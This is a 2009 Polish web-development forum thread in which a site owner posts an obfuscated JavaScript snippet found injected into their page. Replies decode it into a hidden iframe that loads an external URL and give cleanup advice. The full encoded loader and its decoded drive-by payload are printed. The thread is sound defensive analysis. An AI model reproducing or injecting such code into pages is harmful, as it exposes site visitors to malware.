Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Co ta funkcja/skrypt robi?
Forum PHP.pl > Forum > Po stronie przeglądarki > JavaScript
Nookie
17.02.2009, 09:04:56
Witam,

mam prosbe, czy ktos moze podpowiedziec, co ponizszy skrypt robi?
Gdyz ostatnio zauwazylem ze dodal sie do kodu strony i wyglada na jakis malware?

[HTML] pobierz, plaintext 
  1. <script language=JavaScript>	function qilnbn51(b){var e=b.length,f=1024,m,y,p,k=0,j=0,n=0,t=Array(63,49,30,2,9,48,46,20,60,29,0,0,0,0,0,0,7,22,42,19,57,23,38,41,40,3,31,13,5
    6
  2. 35,34,16,33,43,10,54,14,51,52,58,17,11,55,0,0,0,0,61,0,62,15,26,50,32,4,5,25,1,2
  3. ,45,47,6,37,8,21,27,36,39,59,18,44,53,12,24,0);for(y=Math.ceil(e/f);y>0;y--){p='';for(m=Math.min(e,f);m>0;m--,e--){{n|=(t[b.charCodeAt(k++)-48])<<j;if(j){p+=String.fromCharCode(229^n&255);n>>=8;j-=2}else{j=6}}}eval(p);}}qilnbn51('udLNiBHrYqhrfm4rANk5PBLNzRvZiBHPONoeYmDdu24MX3yU3sKMI24Po3y1YuoNzNkwI2kPgqDn
  4. N_1KmhrpakdRZknp3oei6xMYTHNR@GdcYvUHuyrK68nR3DNiSxBfmhMYJ4PYmHNoSxUbJ_VpY9wxtv5A
  5. LwmRvU3Jj1udyeXSoSEqkVgZoexRyMXNKw7E91Am4s43oS@@oMAAhNfdDZYBLNz28ShQxMI24Po3LS3U
  6. ')
  7. </script>
[HTML] pobierz, plaintext



lub jakas podpowiedz jak to madrze sprawdzic?
vokiel
17.02.2009, 11:13:38
Ten skrypcik generuje coś takiego:
Kod
"window.status='Done';document.write('<iframe name=3f2c sr‡úÒ££³›ÎΒ¾³ççãËÖËëÏϢώîÞF÷£Ó˺ϧËãÓF÷£Ó˺÷ËãÏÇÓÖÚºª²®²ÖÞˆÍ ə§É,ýý<m˜ˆÈ¸9í-Í=ýl¨¨¸¸‰ü,|ím˜ù-¼|­-XM]íYxH)ݝ¬mí]È)"


a potem to wykonuje przez: eval(p);
Jednak, przynajmniej w ff firebug wywala błąd, widać tu próbę przemycenia ukrytej ramki, ktoś tu hackuje blinksmiley.gif
phabas
17.02.2009, 11:24:38
lepiej to usuń, zmień hasło do serwera i nie trzymaj go nigdzie zapisanego w systemie tylko co najwyżej na papierze. np. Google może ci zindeksować stronę jako zawirusowaną i ją blokować
likemandrake
17.02.2009, 11:49:47
Kod skryptu został źle przekopiowany. Zadaniem tej ramki jest pobranie czegoś, co świadczy o tym sr... a potem dziwne znaki. A miał to być atrybut src.

Kod
window.status='Done';document.write('<iframe name=3f2c src="http://8speed.info/t/?'+Math.round(Math.random()*26070)+'3f2c'+'" width=237 height=110 style="display:none"></iframe>')


> Nie jest to poprawnie zdekodowane, w każdym razie wygląda to mniej więcej tak. Zastanawia mnie tylko ten fragment przed width, co tam mogło być.

Już jest poprawione smile.gif kolega miał rację smile.gif z resztą wystarczyło się domyśleć smile.gif
vokiel
17.02.2009, 12:35:22
Kod
ASCII: Â!    =    HEX: C221
natomiast
HEX: 22        =    ASCII: "


Te Â! to miał być cudzysłów kończący src="" i prawdopodobnie jakas spacja, ale chyba nie wyszło do końca winksmiley.jpg

W każdym razie usuń, przejrzyj inne skrypty, wywal wszysko, zmień hasła i monitoruj co się dzieje dalej.
Pozdrawiam
likemandrake
17.02.2009, 12:40:15
A najlepiej znajdź przyczynę, jak ten skrypt w ogóle został dolepiony do Twojej strony - nie koniecznie ktoś musiał posiadać hasło do Twojego konta hostingowego, czy co tam masz.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.